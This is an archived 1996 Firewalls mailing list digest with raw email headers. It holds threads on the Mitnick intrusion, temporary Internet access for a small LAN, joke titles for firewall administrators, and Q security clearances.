FAA01568 for firewalls-outgoing; Mon, 15 Jan 1996 05:26:48 -0800 (PST) Received: from vulcan.iss.bnr.com (vulcan.iss.bnr.com [139.51.128.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA01563 for ; Mon, 15 Jan 1996 05:26:41 -0800 (PST) From: Mark_W_Loveless@smtp.bnr.com Received: from smtp.bnr.com by vulcan.iss.bnr.com (4.1/BNR/v1.0/910819) id AA23987; Mon, 15 Jan 96 07:24:19 CST Received: from cc:Mail by smtp.bnr.com id AA821719455; Mon, 15 Jan 96 07:04:28 CST Date: Mon, 15 Jan 96 07:04:28 CST Message-Id: <9600158217.AA821719455@smtp.bnr.com> To: Brain21 Cc: firewalls@GreatCircle.COM Subject: Re[2]: Mitnick & the TCP Sequence Number Attack on Shimomura Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'd say 2. I mean how many times have you set something up -- anything -- that might compromise security on a system. Examples are a) skipping the virus scan on bootup because you're "in a hurry" b) turn off some of the logging on a system until you can get the extra disk space next week c) allow certain r utilities on a couple boxes to make things easier for your job and you'll "watch those boxes closely". I could go on and on. Finger, TFTP, r utilities -- there are a ton of little things out there created to make life easier. Yes they are security risks, but how many times have you wanted to use them for their convience? Even for just a short time? ESPECIALLY on a home system.... Mark_W_Loveless@smtp.bnr.com ______________________________ Reply Separator _________________________________ Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (L Author: Brain21 at internet Date: 1/13/96 12:18 AM Since my posting on Mitnick people have fallen into several camps it seems (BTW, my posting was meant to spurr discussion and demonstrate a different outlook on the situation. I do NOT know what the situation was, and that is why it was full of questions. Hopefully I conveyed that, though if I did not it wouldn't be the first time). the camps are: 1) "Conspiracy" - i.e., involvement of the CIA, NSA, or any other organization with initials. (personally, I don't buy this) 2) He was careless with his own system, and overconfident (the scenario I put forth) 3) He did not have control over the security of the system that he was on (something that Frank stated, and that I stated as a possibility as well in a private email to someone else). 4) Lack of security was done on purpose in order to study hacking attempts, etc. My personal opinion is either 2 or 3. Has anyone on the list actually discussed this with him? I would be interested in his side, since we all really only have part of the story. Anyone? Brain21 From firewalls-owner Mon Jan 15 05:55:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA02053 for firewalls-outgoing; Mon, 15 Jan 1996 05:38:37 -0800 (PST) Received: from ion3.ionet.net (ion3.ionet.net [204.96.200.8]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA02048 for ; Mon, 15 Jan 1996 05:38:34 -0800 (PST) Received: from tektr.ionet.net (osip58.ionet.net [204.96.200.108]) by ion3.ionet.net (8.6.12/8.6.12) with SMTP id HAA02630 for ; Mon, 15 Jan 1996 07:37:32 -0600 Date: Mon, 15 Jan 1996 07:37:32 -0600 Message-Id: <199601151337.HAA02630@ion3.ionet.net> X-Sender: tektr@ionet.net X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.COM From: Tim Richardson Subject: Scalability Sender: firewalls-owner@GreatCircle.COM Precedence: bulk My apologies for posting this in the Firewall news group. Does anyone have information regarding server scalability in respect to total users accessing a system and an increase in bandwidth? I am trying to determine how to represent the future growth plans in our organization as we increase from a single T1 to multiples in order to handle additional customers. I also am trying to determine the growth impact on our web server. (i.e. CPU power, connections, etc.) I cannot find this information anywhere (Of course I am probably not loking in the right place). Any help would be greatly appreciated. Thanks in Advance From firewalls-owner Mon Jan 15 06:10:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA02443 for firewalls-outgoing; Mon, 15 Jan 1996 05:47:12 -0800 (PST) Received: from netcom12.netcom.com (netcom12.netcom.com [192.100.81.124]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA02436 for ; Mon, 15 Jan 1996 05:47:08 -0800 (PST) Received: by netcom12.netcom.com (8.6.12/Netcom) id FAA23100; Mon, 15 Jan 1996 05:45:48 -0800 Date: Mon, 15 Jan 1996 05:45:47 -0800 (PST) From: Robert Zamora Subject: Security Advice To: firewalls@greatcircle.com Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am looking for advice from some of you security gurus out there. Several of the users on my network are clamoring for Internet access. We have plans to implement a full Internet access solution, with application-level gateways, later in the year. However, depending on the level of risk, I would like to provide some of these users with a temporary method of attaining Internet connectivity that I can control, before they start bringing in modems and establishing covert connections. Let me provide some background on our network's configuration. We have a Novell NetWare 4.10 server. The majority of our users have PCs(running Windows 3.1), but we do have a few Macs and Unix boxes. We run IPX, Appletalk, and IP internally. Only the PCs and Macs will be accessing the Internet, and they will be running Netscape Navigator for Web browsing and e-mail. I see three possible "easy" solutions for temporary Internet connectivity. 1) Give them access through a modem pool on the network, using a PC running NetWare Connect. This one is probably risky as there will be packets from the Internet actually entering the LAN. If we set up a device to filter all packets except those that are needed for HTTP and SMTP, again, what can an attacker do to the PC running Netscape Navigator and/or to other systems on our network -- especially the Unix boxes? (Although the most dangerous, this would actually be the preferred solution -- security allowing -- because we can use mechanisms already in place to implement it.) 2) Attach local modems to certain computers. Assuming that the TCP/IP stack will not route between the serial and network interfaces, and assuming that the users will only run Netscape, what is the potential damage that an attacker could do to a user's system and/or to other systems on our network? 3) Setup some non-networked PCs with modems at various locations within the company. Either of the first two options are preferred due to the convenience of being able to work from one's desk. Security, however, is more important than convenience. Also, would going through an information service such as CIS or AOL, instead of a dedicated ISP, make these connections any more/less secure? Would running TIA on a shell account make no difference/increase/reduce the risk? Are there any better solutions that I have overlooked? Thank you for taking time to answer these questions! Robert Zamora From firewalls-owner Mon Jan 15 06:55:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA06547 for firewalls-outgoing; Mon, 15 Jan 1996 06:45:42 -0800 (PST) Received: from tiete.dcc.unicamp.br (dcc.unicamp.br [143.106.1.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA06493 for ; Mon, 15 Jan 1996 06:44:38 -0800 (PST) Received: from grande.unicamp.br (grande.dcc.unicamp.br) by tiete.dcc.unicamp.br (4.1/SMI-4.1) id AA18967; Mon, 15 Jan 96 12:46:10 EDT Received: from jaguari by grande.unicamp.br (SMI-8.6/SMI-SVR4) id MAA01307; Mon, 15 Jan 1996 12:45:48 -0200 Received: by jaguari (5.x/SMI-SVR4) id AA15644; Mon, 15 Jan 1996 12:45:57 -0200 Date: Mon, 15 Jan 1996 12:45:57 -0200 Message-Id: <9601151445.AA15644@jaguari> From: Paulo Licio de Geus To: Firewalls@GreatCircle.COM Subject: Re: "Title for Firewall Admin? In-Reply-To: <9601121933.AA26551@margit> References: <9601121905.AA43800@melupl.melita.com> <9601121933.AA26551@margit> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Dave Kennedy wrote on 12-Jan-96 at 14:05:12 -0500, in part: > >> The mail administrator is "postmaster" > >> The web server admin is "webmaster" > >> Is there such a title for a firewall administrator? I think defining a well-known alias is going to be useful to users, so I'm posting yet another msg on that subject. In keeing in line with the other well-known aliases, with the suffix "master", good suggestions might be, in order of relationship to the real world: gatemaster (as opposed to gatekeeper) netmaster doormaster packetmaster is unnecessarily too technical... MHO, only. -- postmaster/manager Paulo Licio de Geus INTERNET: paulo@dcc.unicamp.br Depto de Ciencia da Computacao voice: +55 192 39-3115/8695/8442 DCC - IMECC - UNICAMP fax: +55 192 39-7470/5808 caixa postal: 6065 13081-970 Campinas SP Brazil From firewalls-owner Mon Jan 15 07:10:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA06657 for firewalls-outgoing; Mon, 15 Jan 1996 06:47:32 -0800 (PST) Received: from softserv.tcst.com (softserv.spectrum.titan.com [199.1.156.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA06642 for ; Mon, 15 Jan 1996 06:47:22 -0800 (PST) Received: (from tighe@localhost) by softserv.tcst.com (8.6.12/8.6.12) id IAA03168; Mon, 15 Jan 1996 08:46:08 -0600 From: Mike Tighe Message-Id: <199601151446.IAA03168@softserv.tcst.com> Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura To: del@giant.IntraNet.com (G. Del Merritt) Date: Mon, 15 Jan 1996 08:46:08 -0600 (CST) Cc: Firewalls@GreatCircle.COM Reply-To: tighe@spectrum.titan.com In-Reply-To: <0099C465F6823600.4060064A@giant.IntraNet.com> from "G. Del Merritt" at Jan 12, 96 11:02:44 am X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk G. Del Merritt writes: >One of the points of SCI is that it is based on need to know. If you don't >need to know about "Q", then you won't necessarily even know that it exists. >And this is what you are told in the briefing process. Q is not SAO/SCI; it is a clearance level. If you apply for a job at one of ther labs, they will tell you you will need a Q. It is hardly need to know. From firewalls-owner Mon Jan 15 07:48:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA07115 for firewalls-outgoing; Mon, 15 Jan 1996 06:59:42 -0800 (PST) Received: from access1.digex.net (access1.digex.net [205.197.245.192]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA07104 for ; Mon, 15 Jan 1996 06:59:38 -0800 (PST) Received: (from curt@localhost) by access1.digex.net (8.6.12/8.6.12) id JAA10397 ; for ; Mon, 15 Jan 1996 09:57:12 -0500 Date: Mon, 15 Jan 1996 09:57:10 -0500 (EST) From: curt williams To: "A. Padgett Peterson, P.E. Information Security" cc: firewalls@GreatCircle.COM Subject: re: "Q" Clearance In-Reply-To: <960112133907.20203704@hobbes.orl.mmc.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk yes, but wasn't "Crypto" really spelled "Krypto"? On Fri, 12 Jan 1996, A. Padgett Peterson, P.E. Information Security wrote: > > I hold a TS SCI clearance with the Air Force. I've been in for almost 10 > > years, and I've never heard of a "Q" clearance. > > Ten years ago is too recent. Back in the days of free trips to SouthEastAsia > there were several compartmented levels above Top Secret such as "R" > and "Crypto" that usually required EBIs. "Q" referred to certain "special > weapons" that I will not go into further. Does Brain21's father glow in the > dark ? > Warmly, > Padgett > From firewalls-owner Mon Jan 15 07:55:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA08320 for firewalls-outgoing; Mon, 15 Jan 1996 07:35:38 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA08315 for ; Mon, 15 Jan 1996 07:35:33 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id HAA20429; Mon, 15 Jan 1996 07:32:31 -0800 Received: from mms.mms.de(193.103.159.2) by mycroft via smap (V1.3mjr) id sma020427; Mon Jan 15 07:31:38 1996 Message-Id: Comments: Authenticated sender is From: "Frank Heinzius" To: "Jay R. Clark" Date: Mon, 15 Jan 1996 16:34:32 +0000 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: RE: "Title for Firewall Admin? Reply-to: frimp@mms.de CC: firewalls@GreatCircle.COM X-mailer: Pegasus Mail for Windows (v2.22) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On 14 Jan 96 at 15:30, Jay R. Clark wrote: > [...] > > Given managements proclivity to often confuse the message with the > messenger, how 'bout "roadkill" as in on the information superhighway > what about "hitcher, the highway killer"? -- ***** The expressed opinions are totally mine! ***** Frank M. Heinzius MMS Communication GmbH frimp@mms.de Eiffestrasse 598 http://www.mms.de Germany Phone: +49 40 211105-0 Fax : +49 40 210 32 210 ***** U.S.Robotics and Livingston Distributor ***** From firewalls-owner Mon Jan 15 08:41:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA08646 for firewalls-outgoing; Mon, 15 Jan 1996 07:42:55 -0800 (PST) Received: from vulcan.iss.bnr.com (vulcan.iss.bnr.com [139.51.128.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA08634 for ; Mon, 15 Jan 1996 07:42:47 -0800 (PST) From: Mark_W_Loveless@smtp.bnr.com Received: from smtp.bnr.com by vulcan.iss.bnr.com (4.1/BNR/v1.0/910819) id AA26129; Mon, 15 Jan 96 09:41:32 CST Received: from cc:Mail by smtp.bnr.com id AA821727627; Mon, 15 Jan 96 08:30:46 CST Date: Mon, 15 Jan 96 08:30:46 CST Message-Id: <9600158217.AA821727627@smtp.bnr.com> To: firewalls@greatcircle.com Subject: The Last Mitnick Post/Thread Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Most everyone is speculating on things we know nothing about. I can only assume hackers hope we spend all our time talking about them and not looking for them on our systems. The definitive book on Mitnick is The Fugitive Game by Jonathan Littman. A lot of it is Mitnick's own words. Well written, much better than Markoff's "hype"rspace writings. Please read this instead of posting unauthenticated "facts" about people most of us have never met or spoken to, let alone saw exactly how they configured everything they were responsible for. Instead, why not discuss the questions it raised -- do we allow lax security on occassion for our own convenience? Do we allow lax security because we "have" to meet some goofy upper management need? How do you justify these acts? Or more importantly, when someone has to have that special need, you give it to them and get burned, what did you do? Blatant attempt to get back on topic, Mark_W_Loveless@smtp.bnr.com From firewalls-owner Mon Jan 15 09:21:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA11385 for firewalls-outgoing; Mon, 15 Jan 1996 08:38:28 -0800 (PST) Received: from shuksan.dnac.com ([192.220.236.22]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA11380 for ; Mon, 15 Jan 1996 08:38:24 -0800 (PST) Received: from Tatonka.dnac.com (192.220.236.157) by shuksan.dnac.com (EMWAC SMTPRS 0.50) with SMTP id ; Mon, 15 Jan 1996 08:37:28 -0800 Message-ID: <30FA8215.60F4@dnac.com> Date: Mon, 15 Jan 1996 08:34:29 -0800 From: "D. Worthington" Organization: Digital Network Architects X-Mailer: Mozilla 2.0b3 (Win95; I) MIME-Version: 1.0 To: "A. Padgett Peterson, P.E. Information Security" CC: firewalls@greatcircle.com Subject: Re: "Q" Clearance References: <960112133907.20203704@hobbes.orl.mmc.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk A. Padgett Peterson, P.E. Information Security wrote: > > > I hold a TS SCI clearance with the Air Force. I've been in for almost 10 > > years, and I've never heard of a "Q" clearance. > > Ten years ago is too recent. Back in the days of free trips to SouthEastAsia > there were several compartmented levels above Top Secret such as "R" > and "Crypto" that usually required EBIs. "Q" referred to certain "special > weapons" that I will not go into further. Does Brain21's father glow in the > dark ? > Warmly, > Padgett During Vietnam, I was assigned to the Army Security Agency (ASA), the military branch of the NSA. This is the way it layed out at that time. There *were* four, and *only* four, levels of security, ranging from FOUO (For Official Use Only) to Confidential, Secret, and Top Secret. Any bona fide citizen of the United States has a "right" to a security clearance, including a top secret security clearance. "Access" to security information, however, was considered a "priviledge." It is this "priviledge" that is actually controlled by the government and its representative agencies. Access is granted, basically, on a "need to know" basis, and it is "levels of access," that are administered by these different designations, "crypto," et.al. The access designations act like a certification of "need to know," and tend to ease the process of constant checking on the level of access priviledge granted to any individual. BTW, I've seen some traffic lately on "classified trash." As someone who has spent many hours in charge of "burn detail," let me assure everyone of two things. First, all classified trash is handled as though it were classified top secret, regardless of its potential "real" classification. Second, all trash created in a secure area is considered classified, regardless of what it "really" is. regards, Don Worthington From firewalls-owner Mon Jan 15 09:25:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA13081 for firewalls-outgoing; Mon, 15 Jan 1996 09:14:11 -0800 (PST) Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA13076 for ; Mon, 15 Jan 1996 09:14:08 -0800 (PST) Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id MAA29510; Mon, 15 Jan 1996 12:12:10 -0500 Date: Mon, 15 Jan 1996 12:12:10 -0500 (EST) From: Brain21 To: Ken Hardy cc: cjwoods@wire.paladin.com, firewalls@GreatCircle.COM Subject: Re: UDP and the unclean... In-Reply-To: <199601111522.AA00773@ignatz.bridge.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 11 Jan 1996, Ken Hardy wrote: > used for control purposes. Does anyone know whether information > concerning the source and/or destination UDP port to be used are first > conveyed over the TCP connection? If so it might be possible, given > protocol details, to write an intelligent proxy that would only allow > "legitimate" realaudio packets through. > > (Don't you love proprietary protocols?) > I would like to know if anyone knows if there is an "RFC," prehaps distributed w/ RealAudio, or otherwise obtainable that describes the protocol used (kinda lie ssh has it's own, unofficial "RFC" included in the distribution)? Or the same for StreamWorks or VDOLive? Any hints? Brain21 From firewalls-owner Mon Jan 15 09:40:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA13342 for firewalls-outgoing; Mon, 15 Jan 1996 09:25:47 -0800 (PST) Received: from Aptech.com (joshua.aptech.com [199.29.185.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA13335 for ; Mon, 15 Jan 1996 09:25:42 -0800 (PST) Received: by Aptech.com (SMI-8.6/SMI-SVR4) id JAA06392; Mon, 15 Jan 1996 09:22:53 -0800 Received: from naomi(199.29.185.132) by joshua via smap (V1.3) id sma006390; Mon Jan 15 09:22:24 1996 Received: from amos.Aptech.com by naomi.Aptech.com (SMI-8.6/SMI-SVR4) id JAA04107; Mon, 15 Jan 1996 09:23:10 -0800 Received: by amos.Aptech.com (SMI-8.6/SMI-SVR4) id JAA13566; Mon, 15 Jan 1996 09:23:04 -0800 Date: Mon, 15 Jan 1996 09:23:04 -0800 From: sjones@Aptech.com (Samuel D. Jones) Message-Id: <199601151723.JAA13566@amos.Aptech.com> To: Firewalls@GreatCircle.COM Subject: Re: "Title for Firewall Admin? X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Net Watchman From firewalls-owner Mon Jan 15 10:18:31 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA13495 for firewalls-outgoing; Mon, 15 Jan 1996 09:33:37 -0800 (PST) Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA13490 for ; Mon, 15 Jan 1996 09:33:33 -0800 (PST) Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id MAA29540; Mon, 15 Jan 1996 12:31:31 -0500 Date: Mon, 15 Jan 1996 12:31:30 -0500 (EST) From: Brain21 To: Frederick M Avolio cc: Bill Curr , firewalls@GreatCircle.COM Subject: Re: "Title for Firewall Admin? In-Reply-To: <2.2.16.19960112143121.3f9720e2@gauntlet-1.trusted.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 12 Jan 1996, Frederick M Avolio wrote: > > "gatekeeper" is a fun possibility. "doorman" is too plain. > What about "Gozer (sp), the Key Master?" Brain21 From firewalls-owner Mon Jan 15 10:27:10 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA14191 for firewalls-outgoing; Mon, 15 Jan 1996 09:53:49 -0800 (PST) Received: from inet1.tek.com (inet1.tek.com [134.62.48.21]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA14186 for ; Mon, 15 Jan 1996 09:53:45 -0800 (PST) Received: by inet1.tek.com id ; Mon, 15 Jan 1996 09:52:49 -0800 Received: from tektronix.tek.com(134.62.48.24) by inet1 via smap (V1.3) id sma022208; Mon Jan 15 09:44:56 1996 Received: from orca.wv.tek.com by tektronix.TEK.COM (4.1/8.2) id AA11782; Mon, 15 Jan 96 07:32:00 PST Received: from trouble.WV.TEK.COM by orca.wv.tek.com (4.1/8.2) id AA03335; Mon, 15 Jan 96 07:33:30 PST Received: by trouble.WV.TEK.COM (4.1/8.0) id AA06314; Mon, 15 Jan 96 07:31:16 PST Date: Mon, 15 Jan 1996 07:31:14 -0800 (PST) From: Kent Dahlgren To: "A. Padgett Peterson, P.E. Information Security" Cc: firewalls@greatcircle.COM Subject: re: "Q" Clearance In-Reply-To: <960112133907.20203704@hobbes.orl.mmc.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 12 Jan 1996, A. Padgett Peterson, P.E. Information Security wrote: > > I hold a TS SCI clearance with the Air Force. I've been in for almost 10 > > years, and I've never heard of a "Q" clearance. > > Ten years ago is too recent. Back in the days of free trips to SouthEastAsia > there were several compartmented levels above Top Secret such as "R" > and "Crypto" that usually required EBIs. "Q" referred to certain "special > weapons" that I will not go into further. Does Brain21's father glow in the > dark ? > Warmly, Every day since I made the mistake of replying in haste I have kicked myself for being such an idiot. I was so wrong to ever start such a discussion on these subjects in this arena I can't even believe it. I stand guilty of immaturity, and long for the day when I come to work, log in, and don't have to see my name connected to any more DOD security clearances discussions....on the Internet! Although the flames were stinging, I appreciate thier intent. Kent. ______________________________________________________________________________ ______ T E K T R O N I X _ C P I D _ T E C H N I C A L _ S U P P O R T _______ / Voice: 1.800.835.6100 E-mail: support@colorprinters.tek.com Fax: 1.503.685.3063 WWW: www.tek.com BBS: 1.503.685.4504 E-World: Keyword Tektronix HAL: 1.503.682.7450 AOL: Keyword Tektronix Service: 1.800.835.6100 FTP: ftp.tek.com ______________________________________________________________________________ From firewalls-owner Mon Jan 15 10:40:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA14829 for firewalls-outgoing; Mon, 15 Jan 1996 10:03:32 -0800 (PST) Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA14824 for ; Mon, 15 Jan 1996 10:03:29 -0800 (PST) Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id NAA29638; Mon, 15 Jan 1996 13:01:31 -0500 Date: Mon, 15 Jan 1996 13:01:31 -0500 (EST) From: Brain21 To: Ken Hays cc: Dave Kennedy , Shawn Steele , Firewalls@GreatCircle.COM Subject: Re: "Title for Firewall Admin? In-Reply-To: <9601121933.AA26551@margit> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 12 Jan 1996, Ken Hays wrote: > >Remember "Ghostbusters?" There was the gatekeeper and the keymaster. > > I would suggest that keymaster be reserved for the Kerberos administrator. > I think Gozer was the keymaster, does anyone remember the Gatekeepers name? Brain21 From firewalls-owner Mon Jan 15 11:04:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA18169 for firewalls-outgoing; Mon, 15 Jan 1996 10:49:22 -0800 (PST) Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA18164 for ; Mon, 15 Jan 1996 10:49:17 -0800 (PST) Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id NAA29745; Mon, 15 Jan 1996 13:47:13 -0500 Date: Mon, 15 Jan 1996 13:47:13 -0500 (EST) From: Brain21 To: "A. Padgett Peterson, P.E. Information Security" cc: firewalls@GreatCircle.COM Subject: re: "Q" Clearance In-Reply-To: <960112133907.20203704@hobbes.orl.mmc.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 12 Jan 1996, A. Padgett Peterson, P.E. Information Security wrote: > and "Crypto" that usually required EBIs. "Q" referred to certain "special > weapons" that I will not go into further. Does Brain21's father glow in the > dark ? I guess you'd have to ask my mom. :) Brain21 From firewalls-owner Mon Jan 15 11:18:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA15602 for firewalls-outgoing; Mon, 15 Jan 1996 10:14:17 -0800 (PST) Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA15593 for ; Mon, 15 Jan 1996 10:14:12 -0800 (PST) Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id NAA29675; Mon, 15 Jan 1996 13:12:09 -0500 Date: Mon, 15 Jan 1996 13:12:09 -0500 (EST) From: Brain21 To: "G. Del Merritt" cc: Firewalls@GreatCircle.COM Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura In-Reply-To: <0099C465F6823600.4060064A@giant.IntraNet.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 12 Jan 1996, G. Del Merritt wrote: > need to know about "Q", then you won't necessarily even know that it exists. > And this is what you are told in the briefing process. > > So Cool. Now the world knows more about you all. This shows quite well that > firewalls cannot contain sensitive information; only people can. Firewalls > can at best just impede the flow. > > A story, perhaps legend, passed on to me by my security officer when I was > still a part of the MIC: > Fellow who has long been waiting for his clearance walks into the local bar, > sees his buddies, and hollers, "I'm SECRET, I'm SECRET!". Next day he wasn't. OK, combine the above, with another posters commentary on someone inadvertantly saying something about "snow tires" over some line of communication that s/he shouldn't have, and you get at what I was trying to point out (or at least part of it) in my post. The point is that the possibility is there, and that (I think) the government should be resonsible for educating their sub-contractors who may not have security officeers, or have ones athat are not FULLY aware of the government's regulations regarding this topic. The sub-contractor that my dad used to work for was obviously NOT, or he would not have asked me just how secure internet email was. My father did NOTHING that would even insinuate that there is ANYTHING to arrest him for (sheesh! Some people need everthing spelled out explicitly, I think), but he was NOT educated either by his company OR the government as to these issues. I really don't think anyone said anything to him other than a passing "don't send this stuff out over the net. The net is for administrative email between offices, like arranging business trips, etc. and asking for fax requests," *IF* they even said that much. To me, this situation represents dangerous possibilities for the exact reason illustrated by the above quote (Del Merrit's quote). Thanks for everyone's 'understanding' (yeah....), Brain21 From firewalls-owner Mon Jan 15 11:40:50 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA19923 for firewalls-outgoing; Mon, 15 Jan 1996 11:33:21 -0800 (PST) Received: from alpha.xerox.com (alpha.Xerox.COM [13.1.64.93]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA19911 for ; Mon, 15 Jan 1996 11:33:16 -0800 (PST) Received: from reynaldo.parc.xerox.com ([13.2.116.96]) by alpha.xerox.com with SMTP id <15864(1)>; Mon, 15 Jan 1996 11:32:17 PST Received: from localhost ([127.0.0.1]) by reynaldo.parc.xerox.com with SMTP id <34953>; Mon, 15 Jan 1996 11:31:14 -0800 X-Mailer: exmh version 1.6.4 10/10/95 To: Brain21 cc: Berry Kercheval , firewalls@greatcircle.com, kerch@parc.xerox.com Subject: Re: "Q" Clearance In-reply-to: Your message of "Mon, 15 Jan 1996 11:13:09 PST." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 15 Jan 1996 11:31:08 PST From: Berry Kercheval Message-Id: <96Jan15.113114pst.34953@reynaldo.parc.xerox.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>>Brain21 said: > On Sat, 13 Jan 1996, Berry Kercheval wrote: > These people told him that his > "Q" clearance simply was not good enough for the work that he was going > to be doing, and he had to wait for clearance before he knew if he got > the job It's not uncommon. It's more often that your Frobozz clearance cannot be used for Xyzzy work, more because it's *different* than that it's "not good enough". My DoD Top Secret clearance went through much quicker because I already had a DoE clearance -- they could share files or something. > important one). I say it is odd, because prior to his changing jobs I > had only heard of DoD terms, and I *had* heard of "Q" clearance. Well, Peter Benchley (Mr. "Jaws") wrote a perfectly dreadful novel called "Q Clearance" in which he got nearly every fact about Q clearances, DoE, DoD and classified work in general wrong. (To his credit, the DoD Headquarters *ARE* in a 5-sided building in Arlington, and the DoE HQ *IS* in DC proper...) > Is > there not, perhaps, something in the DoD that is similar in > pronounciation? Not one that *I* know of. Of course, *I* don't have a need-to-know :-) > > The DoD controls all the military in the US. The DoE controls research, > Well, these two, and other agencies *do* have duties that overlap, but > the goes w/o saying. Of course. I didn't want to go beyond the one-sentence summary on a topic that was already too far from Firewalls... --berry Berry Kercheval :: kerch@parc.xerox.com :: Xerox Palo Alto Research Center From firewalls-owner Mon Jan 15 11:55:50 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA14291 for firewalls-outgoing; Mon, 15 Jan 1996 09:55:08 -0800 (PST) Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA14276 for ; Mon, 15 Jan 1996 09:54:59 -0800 (PST) Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id 